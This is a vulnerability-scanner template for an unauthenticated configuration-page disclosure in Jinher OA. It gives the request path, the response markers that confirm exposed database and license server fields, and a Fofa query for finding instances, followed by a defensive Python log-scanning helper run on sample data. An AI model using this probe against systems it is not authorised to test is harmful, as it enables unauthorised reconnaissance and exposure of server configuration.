Vulnerability description
Fofa app="金和网络-金和OA"
id: jinher-oa-sap-b1config-disclosure

info:
  name: 金和OA SAP_B1Config.aspx未授权访问漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa app="金和网络-金和OA"
  reference:
    - https://mp.weixin.qq.com/s?__biz=Mzg2MjkwMDY3OA==&mid=2247484635&idx=1&sn=485937343b296937a78c132c3dfdb71b&chksm=ce019c72f976156477da4fd7c5efb6b6e61ac05646241d302e4d17ec6b230cb79e55aa8b981e&cur_album_id=3090557023571722241&scene=189#wechat_redirect
  tags: jinher,oa,disclosure
  created: 2024/01/16

rules:
  r0:
    request:
      method: GET
      path: /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'txtLicenseServer') &&
      response.body.bcontains(b'txtDatabaseServer')
expression: r0()
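Added example, not part of the template above or of the Jinher product: a small Python helper for defenders that mirrors the r0 match expression (HTTP 200 plus both form-field markers in the body) so an administrator can confirm whether their own instance still serves the configuration page, and that scans web-server access-log lines for requests to that path, flagging the ones answered with 200. The log lines, IPs and timestamps are constructed sample data.

```python
import re
from dataclasses import dataclass

# Signatures taken from the template: the request path and the two
# form-field names that the r0 expression looks for in the response body.
TARGET_PATH = "/C6/JHsoft.CostEAI/SAP_B1Config.aspx"
BODY_MARKERS = (b"txtLicenseServer", b"txtDatabaseServer")


def rule_matches(status: int, body: bytes) -> bool:
    """Same logic as the template's r0 expression: 200 and both markers present."""
    return status == 200 and all(marker in body for marker in BODY_MARKERS)


# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jan/2024:10:01:02 +0800] "GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Jan/2024:10:01:03 +0800] "GET /C6/Login.aspx HTTP/1.1" 200 2048
198.51.100.9 - - [16/Jan/2024:10:05:44 +0800] "GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Hit:
    ip: str
    ts: str
    url: str
    status: int
    unauthenticated_disclosure: bool  # True when the server answered 200


def find_config_page_hits(log_text: str) -> list[Hit]:
    """Return every request to the config page; a 200 means it was served."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Normalise away the query string and trailing slash before comparing.
        path = m["url"].split("?", 1)[0].rstrip("/")
        if path.lower() != TARGET_PATH.lower():
            continue
        status = int(m["status"])
        hits.append(Hit(m["ip"], m["ts"], m["url"], status, status == 200))
    return hits
```

A 302 or 401 on that path indicates the page is behind authentication; a 200 in the log is what should be escalated.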